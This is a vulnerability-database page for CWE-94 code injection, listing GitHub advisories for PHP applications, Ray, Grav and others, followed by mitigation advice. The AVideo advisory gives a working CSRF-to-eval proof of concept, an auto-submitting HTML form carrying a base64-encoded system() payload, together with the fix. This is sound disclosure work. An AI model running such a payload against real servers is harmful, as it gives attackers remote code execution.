Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8283 vulnerabilities reference this CWE, most recent first.

GHSA-XFVW-4C4P-X4MF

Vulnerability from github – Published: 2022-05-01 07:06 – Updated: 2022-05-01 07:06
VLAI
Details

Multiple PHP remote file inclusion vulnerabilities in mcGuestbook 1.3 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) admin.php, (2) ecrire.php, and (3) lire.php. NOTE: it was later reported that the ecrire.php vector also affects 1.2. NOTE: this issue might be limited to a race condition during installation or an improper installation, since a completed installation creates an include file that prevents external control of the $lang variable.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-3175"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-06-23T00:02:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple PHP remote file inclusion vulnerabilities in mcGuestbook 1.3 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) admin.php, (2) ecrire.php, and (3) lire.php. NOTE: it was later reported that the ecrire.php vector also affects 1.2.  NOTE: this issue might be limited to a race condition during installation or an improper installation, since a completed installation creates an include file that prevents external control of the $lang variable.",
  "id": "GHSA-xfvw-4c4p-x4mf",
  "modified": "2022-05-01T07:06:36Z",
  "published": "2022-05-01T07:06:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-3175"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27114"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/1125"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/27460"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/27461"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/27462"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/437028/100/200/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/437448/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/18476"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XFW8-HCHC-MC9R

Vulnerability from github – Published: 2022-05-14 03:31 – Updated: 2022-05-14 03:31
VLAI
Details

An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-8966"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-03-24T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php.",
  "id": "GHSA-xfw8-hchc-mc9r",
  "modified": "2022-05-14T03:31:27Z",
  "published": "2022-05-14T03:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8966"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Ni9htMar3/vulnerability/blob/master/zzcms_8.2/install.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XFWX-G8WM-38Q3

Vulnerability from github – Published: 2022-05-01 17:53 – Updated: 2022-05-01 17:53
VLAI
Details

Multiple PHP remote file inclusion vulnerabilities in PMB Services 3.0.13 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) class_path parameter to (a) includes/resa_func.inc.php (b) admin/notices/perso.inc.php, or (c) admin/quotas/main.inc.php; the (2) base_path parameter to (d) opac_css/rec_panier.php or (e) opac_css/includes/author_see.inc.php; or the (3) include_path parameter to (f) bull_info.inc.php or (g) misc.inc.php in includes/; (h) options_date_box.php, (i) options_file_box.php, (j) options_list.php, (k) options_query_list.php, or (l) options_text.php in includes/options/; (m) options.php, (n) options_comment.php, (o) options_date_box.php, (p) options_list.php, (q) options_query_list.php, or (r) options_text.php in includes/options_empr/; or (s) admin/import/iimport_expl.php, (t) admin/netbase/clean.php, (u) admin/param/param_func.inc.php, (v) admin/sauvegarde/lieux.inc.php, (w) autorites.php, (x) account.php, (y) cart.php, or (z) edit.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2007-1415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-03-12T23:19:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple PHP remote file inclusion vulnerabilities in PMB Services 3.0.13 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) class_path parameter to (a) includes/resa_func.inc.php (b) admin/notices/perso.inc.php, or (c) admin/quotas/main.inc.php; the (2) base_path parameter to (d) opac_css/rec_panier.php or (e) opac_css/includes/author_see.inc.php; or the (3) include_path parameter to (f) bull_info.inc.php or (g) misc.inc.php in includes/; (h) options_date_box.php, (i) options_file_box.php, (j) options_list.php, (k) options_query_list.php, or (l) options_text.php in includes/options/; (m) options.php, (n) options_comment.php, (o) options_date_box.php, (p) options_list.php, (q) options_query_list.php, or (r) options_text.php in includes/options_empr/; or (s) admin/import/iimport_expl.php, (t) admin/netbase/clean.php, (u) admin/param/param_func.inc.php, (v) admin/sauvegarde/lieux.inc.php, (w) autorites.php, (x) account.php, (y) cart.php, or (z) edit.php.",
  "id": "GHSA-xfwx-g8wm-38q3",
  "modified": "2022-05-01T17:53:21Z",
  "published": "2022-05-01T17:53:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-1415"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32890"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/3443"
    },
    {
      "type": "WEB",
      "url": "http://advisories.echo.or.id/adv/adv68-K-159-2007.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35101"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35102"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35103"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35104"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35105"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35106"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35107"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35108"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35109"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35110"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35111"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35112"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35113"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35114"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35115"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35116"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35117"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35118"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35119"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35120"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35121"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35122"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35123"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35124"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/35125"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/462452/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/22895"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/0917"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XFXH-47FX-QRXV

Vulnerability from github – Published: 2022-05-01 02:21 – Updated: 2022-05-01 02:21
VLAI
Details

PHP remote file inclusion vulnerability in athena.php in Oliver May Athena PHP Website Administration 0.1a allows remote attackers to execute arbitrary PHP code via a URL in the athena_dir parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2005-3860"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2005-11-29T11:03:00Z",
    "severity": "HIGH"
  },
  "details": "PHP remote file inclusion vulnerability in athena.php in Oliver May Athena PHP Website Administration 0.1a allows remote attackers to execute arbitrary PHP code via a URL in the athena_dir parameter.",
  "id": "GHSA-xfxh-47fx-qrxv",
  "modified": "2022-05-01T02:21:51Z",
  "published": "2022-05-01T02:21:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-3860"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/208"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1015278"
    },
    {
      "type": "WEB",
      "url": "http://sourceforge.net/forum/forum.php?forum_id=514746"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/417796/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/15574"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2005/2599"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XG2H-7CXJ-3GVH

Vulnerability from github – Published: 2025-02-12 00:32 – Updated: 2025-02-14 21:30
VLAI
Summary
Withdrawn Advisory: Command injection in Ray
Details

Withdrawn Advisory

This advisory is a duplicate of GHSA-6wgj-66m2-xxp2 / CVE-2023-48022.

Original Description

An issue in Anyscale Inc Ray between v.2.9.3 and v.2.40.0 allows a remote attacker to execute arbitrary code via a crafted script.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ray"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.9.3"
            },
            {
              "last_affected": "2.40.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-57000"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-12T19:33:10Z",
    "nvd_published_at": "2025-02-11T23:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "# Withdrawn Advisory\nThis advisory is a duplicate of GHSA-6wgj-66m2-xxp2 / CVE-2023-48022.\n\n# Original Description\nAn issue in Anyscale Inc Ray between v.2.9.3 and v.2.40.0 allows a remote attacker to execute arbitrary code via a crafted script.",
  "id": "GHSA-xg2h-7cxj-3gvh",
  "modified": "2025-02-14T21:30:14Z",
  "published": "2025-02-12T00:32:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57000"
    },
    {
      "type": "WEB",
      "url": "https://github.com/honysyang/Ray.git"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ray-project/ray"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Withdrawn Advisory: Command injection in Ray",
  "withdrawn": "2025-02-14T21:30:14Z"
}

GHSA-XG4X-XHFV-P56H

Vulnerability from github – Published: 2022-05-24 17:29 – Updated: 2022-05-24 17:29
VLAI
Details

The login page in Telmat AccessLog <= 6.0 (TAL_20180415) allows an attacker to get root shell access via Unauthenticated code injection over the network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-16147"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-09-24T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The login page in Telmat AccessLog \u003c= 6.0 (TAL_20180415) allows an attacker to get root shell access via Unauthenticated code injection over the network.",
  "id": "GHSA-xg4x-xhfv-p56h",
  "modified": "2022-05-24T17:29:23Z",
  "published": "2022-05-24T17:29:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-16147"
    },
    {
      "type": "WEB",
      "url": "https://podalirius.net/cves/2020-16147"
    },
    {
      "type": "WEB",
      "url": "https://podalirius.net/en/cves/2020-16147"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XG8J-6M35-M6WR

Vulnerability from github – Published: 2026-07-10 15:31 – Updated: 2026-07-10 15:31
VLAI
Details

Grav before 2.0.2 contains a Twig sandbox bypass that allows a page author (any admin.pages user, or anyone able to write to user/pages) to exfiltrate configuration secrets. Although the sandbox replaces the 'config' variable with a redacted facade and strips Config::get/toArray from the method allowlist, the raw container remains accessible via the allow-listed grav.offsetGet('config'), which returns the real Config object. Allow-listed object-dumping filters (json_encode, print_r, yaml_encode) then serialize that object at the PHP level without invoking the sandbox method gate, exposing the full config tree including plugin secrets such as SMTP credentials, API keys, and plugin DB credentials. This is an incomplete fix for GHSA-j274-39qw-32c9.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-61450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-10T15:16:50Z",
    "severity": "HIGH"
  },
  "details": "Grav before 2.0.2 contains a Twig sandbox bypass that allows a page author (any admin.pages user, or anyone able to write to user/pages) to exfiltrate configuration secrets. Although the sandbox replaces the \u0027config\u0027 variable with a redacted facade and strips Config::get/toArray from the method allowlist, the raw container remains accessible via the allow-listed grav.offsetGet(\u0027config\u0027), which returns the real Config object. Allow-listed object-dumping filters (json_encode, print_r, yaml_encode) then serialize that object at the PHP level without invoking the sandbox method gate, exposing the full config tree including plugin secrets such as SMTP credentials, API keys, and plugin DB credentials. This is an incomplete fix for GHSA-j274-39qw-32c9.",
  "id": "GHSA-xg8j-6m35-m6wr",
  "modified": "2026-07-10T15:31:42Z",
  "published": "2026-07-10T15:31:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-mc5q-6hpj-rp7j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-61450"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/grav-before-config-exfiltration-via-offsetget-filter"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XG9V-2CVQ-43HG

Vulnerability from github – Published: 2022-05-01 07:44 – Updated: 2022-05-01 07:44
VLAI
Details

PHP remote file inclusion vulnerability in phpbb_security.php in phpBB Security 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the php_root_path parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-7090"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-03-02T21:18:00Z",
    "severity": "MODERATE"
  },
  "details": "PHP remote file inclusion vulnerability in phpbb_security.php in phpBB Security 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the php_root_path parameter.",
  "id": "GHSA-xg9v-2cvq-43hg",
  "modified": "2022-05-01T07:44:44Z",
  "published": "2022-05-01T07:44:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-7090"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29573"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/2327"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/448607"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/20518"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-XGGW-G9PM-9QHH

Vulnerability from github – Published: 2026-03-20 20:44 – Updated: 2026-03-25 18:49
VLAI
Summary
AVideo has PHP Code Injection via eval() in Gallery saveSort.json.php Exploitable Through CSRF Against Admin
Details

Summary

The Gallery plugin's saveSort.json.php endpoint passes unsanitized user input from $_REQUEST['sections'] array values directly into PHP's eval() function. While the endpoint is gated behind User::isAdmin(), it has no CSRF token validation. Combined with AVideo's explicit SameSite=None session cookie configuration, an attacker can exploit this via cross-site request forgery to achieve unauthenticated remote code execution — requiring only that an admin visits an attacker-controlled page.

Details

Vulnerable codeplugin/Gallery/view/saveSort.json.php:20-25:

if(!empty($_REQUEST['sections'])){
    $object = $gallery->getDataObject();
    foreach ($_REQUEST['sections'] as $key => $value) {
        $obj->sectionsSaved[] = array($key=>$value);
        eval("\$object->{$value}Order = \$key;");
    }
    $obj->error = !$gallery->setDataObject($object);
}

The $value variable from $_REQUEST['sections'] is interpolated directly into the string passed to eval() with no sanitization — no allowlist, no regex validation, no escaping. Normal Gallery usage sends section names like 'Shorts', 'Trending', etc. from jQuery UI sortable, but the server enforces no such constraint.

CSRF enablementobjects/include_config.php:134-137:

if ($isHTTPS) {
    ini_set('session.cookie_samesite', 'None');
    ini_set('session.cookie_secure', '1');
}

The session cookie is explicitly set to SameSite=None, which instructs browsers to send the cookie on cross-site requests. This is also reinforced in objects/functionsPHP.php:330-333 where additional cookies are set with SameSite=None; Secure.

No CSRF protection — The endpoint performs no CSRF token validation, no Origin header check, no Referer header check, and no X-Requested-With header check. There is no global CSRF middleware in AVideo's bootstrap chain.

Exploit chain: 1. Attacker crafts a page with an auto-submitting form targeting saveSort.json.php 2. Admin visits the attacker's page (e.g., via a link in a comment, email, or message) 3. The browser sends the cross-site POST request with the admin's session cookie attached (due to SameSite=None) 4. User::isAdmin() passes because the admin's session is present 5. The injected PHP code in the sections array value is passed to eval() and executes

PoC

Step 1: Host the following HTML on an attacker-controlled server:

<!DOCTYPE html>
<html>
<body>
<form id="exploit" action="https://TARGET/plugin/Gallery/view/saveSort.json.php" method="POST">
  <input type="hidden" name="sections[0]" value="x=1;system(base64_decode('aWQ7aG9zdG5hbWU='));//">
</form>
<script>document.getElementById('exploit').submit();</script>
</body>
</html>

The base64 decodes to id;hostname.

Step 2: Lure an authenticated AVideo admin to visit the page.

Step 3: The eval on line 24 executes:

$object->x=1;system(base64_decode('aWQ7aG9zdG5hbWU='));//Order = 0;

This breaks out of the property assignment, calls system() with attacker-controlled arguments, and comments out the rest of the line. The response JSON will contain the command output, but even without seeing the response, the command executes server-side.

Expected result: The id and hostname commands execute on the server under the web server's user context.

Impact

  • Remote Code Execution — An attacker achieves arbitrary PHP code execution on the server by luring an admin to visit a malicious page. No prior authentication or account on the target is required.
  • Full server compromise — The attacker can read/write files, access the database, pivot to other services, install backdoors, or exfiltrate data.
  • Stealth — The attack is a single form submission that completes in milliseconds. The admin may not notice anything unusual.
  • Blast radius — Any AVideo instance running over HTTPS (which triggers SameSite=None) where an admin can be lured to click a link is vulnerable.

Recommended Fix

Primary fix — Replace eval() with an allowlist check:

In plugin/Gallery/view/saveSort.json.php, replace lines 20-26:

if(!empty($_REQUEST['sections'])){
    $object = $gallery->getDataObject();
    $allowedSections = ['Shorts', 'Trending', 'SiteSuggestion', 'Newest', 
                        'Subscribe', 'Popular', 'LiveStream', 'Category', 
                        'Program', 'Channel'];
    foreach ($_REQUEST['sections'] as $key => $value) {
        if (!in_array($value, $allowedSections, true)) {
            continue;
        }
        $obj->sectionsSaved[] = array($key => $value);
        $property = $value . 'Order';
        $object->$property = intval($key);
    }
    $obj->error = !$gallery->setDataObject($object);
}

This eliminates eval() entirely, validates $value against a known allowlist of section names, and uses dynamic property access ($object->$property) instead of code generation.

Secondary fix — Add CSRF protection to all state-changing endpoints, or at minimum set SameSite=Lax on session cookies instead of SameSite=None in objects/include_config.php:135:

ini_set('session.cookie_samesite', 'Lax');

This prevents session cookies from being sent on cross-site form submissions, blocking the CSRF vector for all endpoints.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33479"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:44:02Z",
    "nvd_published_at": "2026-03-23T15:16:34Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe Gallery plugin\u0027s `saveSort.json.php` endpoint passes unsanitized user input from `$_REQUEST[\u0027sections\u0027]` array values directly into PHP\u0027s `eval()` function. While the endpoint is gated behind `User::isAdmin()`, it has no CSRF token validation. Combined with AVideo\u0027s explicit `SameSite=None` session cookie configuration, an attacker can exploit this via cross-site request forgery to achieve unauthenticated remote code execution \u2014 requiring only that an admin visits an attacker-controlled page.\n\n## Details\n\n**Vulnerable code** \u2014 `plugin/Gallery/view/saveSort.json.php:20-25`:\n\n```php\nif(!empty($_REQUEST[\u0027sections\u0027])){\n    $object = $gallery-\u003egetDataObject();\n    foreach ($_REQUEST[\u0027sections\u0027] as $key =\u003e $value) {\n        $obj-\u003esectionsSaved[] = array($key=\u003e$value);\n        eval(\"\\$object-\u003e{$value}Order = \\$key;\");\n    }\n    $obj-\u003eerror = !$gallery-\u003esetDataObject($object);\n}\n```\n\nThe `$value` variable from `$_REQUEST[\u0027sections\u0027]` is interpolated directly into the string passed to `eval()` with no sanitization \u2014 no allowlist, no regex validation, no escaping. Normal Gallery usage sends section names like `\u0027Shorts\u0027`, `\u0027Trending\u0027`, etc. from jQuery UI sortable, but the server enforces no such constraint.\n\n**CSRF enablement** \u2014 `objects/include_config.php:134-137`:\n\n```php\nif ($isHTTPS) {\n    ini_set(\u0027session.cookie_samesite\u0027, \u0027None\u0027);\n    ini_set(\u0027session.cookie_secure\u0027, \u00271\u0027);\n}\n```\n\nThe session cookie is explicitly set to `SameSite=None`, which instructs browsers to send the cookie on cross-site requests. This is also reinforced in `objects/functionsPHP.php:330-333` where additional cookies are set with `SameSite=None; Secure`.\n\n**No CSRF protection** \u2014 The endpoint performs no CSRF token validation, no Origin header check, no Referer header check, and no `X-Requested-With` header check. There is no global CSRF middleware in AVideo\u0027s bootstrap chain.\n\n**Exploit chain:**\n1. Attacker crafts a page with an auto-submitting form targeting `saveSort.json.php`\n2. Admin visits the attacker\u0027s page (e.g., via a link in a comment, email, or message)\n3. The browser sends the cross-site POST request **with the admin\u0027s session cookie** attached (due to `SameSite=None`)\n4. `User::isAdmin()` passes because the admin\u0027s session is present\n5. The injected PHP code in the `sections` array value is passed to `eval()` and executes\n\n## PoC\n\n**Step 1:** Host the following HTML on an attacker-controlled server:\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform id=\"exploit\" action=\"https://TARGET/plugin/Gallery/view/saveSort.json.php\" method=\"POST\"\u003e\n  \u003cinput type=\"hidden\" name=\"sections[0]\" value=\"x=1;system(base64_decode(\u0027aWQ7aG9zdG5hbWU=\u0027));//\"\u003e\n\u003c/form\u003e\n\u003cscript\u003edocument.getElementById(\u0027exploit\u0027).submit();\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nThe base64 decodes to `id;hostname`.\n\n**Step 2:** Lure an authenticated AVideo admin to visit the page.\n\n**Step 3:** The eval on line 24 executes:\n```php\n$object-\u003ex=1;system(base64_decode(\u0027aWQ7aG9zdG5hbWU=\u0027));//Order = 0;\n```\n\nThis breaks out of the property assignment, calls `system()` with attacker-controlled arguments, and comments out the rest of the line. The response JSON will contain the command output, but even without seeing the response, the command executes server-side.\n\n**Expected result:** The `id` and `hostname` commands execute on the server under the web server\u0027s user context.\n\n## Impact\n\n- **Remote Code Execution** \u2014 An attacker achieves arbitrary PHP code execution on the server by luring an admin to visit a malicious page. No prior authentication or account on the target is required.\n- **Full server compromise** \u2014 The attacker can read/write files, access the database, pivot to other services, install backdoors, or exfiltrate data.\n- **Stealth** \u2014 The attack is a single form submission that completes in milliseconds. The admin may not notice anything unusual.\n- **Blast radius** \u2014 Any AVideo instance running over HTTPS (which triggers `SameSite=None`) where an admin can be lured to click a link is vulnerable.\n\n## Recommended Fix\n\n**Primary fix \u2014 Replace `eval()` with an allowlist check:**\n\nIn `plugin/Gallery/view/saveSort.json.php`, replace lines 20-26:\n\n```php\nif(!empty($_REQUEST[\u0027sections\u0027])){\n    $object = $gallery-\u003egetDataObject();\n    $allowedSections = [\u0027Shorts\u0027, \u0027Trending\u0027, \u0027SiteSuggestion\u0027, \u0027Newest\u0027, \n                        \u0027Subscribe\u0027, \u0027Popular\u0027, \u0027LiveStream\u0027, \u0027Category\u0027, \n                        \u0027Program\u0027, \u0027Channel\u0027];\n    foreach ($_REQUEST[\u0027sections\u0027] as $key =\u003e $value) {\n        if (!in_array($value, $allowedSections, true)) {\n            continue;\n        }\n        $obj-\u003esectionsSaved[] = array($key =\u003e $value);\n        $property = $value . \u0027Order\u0027;\n        $object-\u003e$property = intval($key);\n    }\n    $obj-\u003eerror = !$gallery-\u003esetDataObject($object);\n}\n```\n\nThis eliminates `eval()` entirely, validates `$value` against a known allowlist of section names, and uses dynamic property access (`$object-\u003e$property`) instead of code generation.\n\n**Secondary fix \u2014 Add CSRF protection** to all state-changing endpoints, or at minimum set `SameSite=Lax` on session cookies instead of `SameSite=None` in `objects/include_config.php:135`:\n\n```php\nini_set(\u0027session.cookie_samesite\u0027, \u0027Lax\u0027);\n```\n\nThis prevents session cookies from being sent on cross-site form submissions, blocking the CSRF vector for all endpoints.",
  "id": "GHSA-xggw-g9pm-9qhh",
  "modified": "2026-03-25T18:49:29Z",
  "published": "2026-03-20T20:44:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xggw-g9pm-9qhh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33479"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/087dab8841f8bdb54be184105ef19b47c5698fcb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has PHP Code Injection via eval() in Gallery saveSort.json.php Exploitable Through CSRF Against Admin"
}

GHSA-XGGX-88W4-2942

Vulnerability from github – Published: 2024-06-26 21:32 – Updated: 2024-08-01 15:31
VLAI
Details

File upload vulnerability found in Softexpert Excellence Suite v.2.1 allows attackers to execute arbitrary code via a .php file upload to the form/efms_exec_html/file_upload_parser.php endpoint.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-26877"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-26T20:15:14Z",
    "severity": "MODERATE"
  },
  "details": "File upload vulnerability found in Softexpert Excellence Suite v.2.1 allows attackers to execute arbitrary code via a .php file upload to the form/efms_exec_html/file_upload_parser.php endpoint.",
  "id": "GHSA-xggx-88w4-2942",
  "modified": "2024-08-01T15:31:51Z",
  "published": "2024-06-26T21:32:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26877"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/rodnt/90ac26fdf891e602f6f090d6aebce32d"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
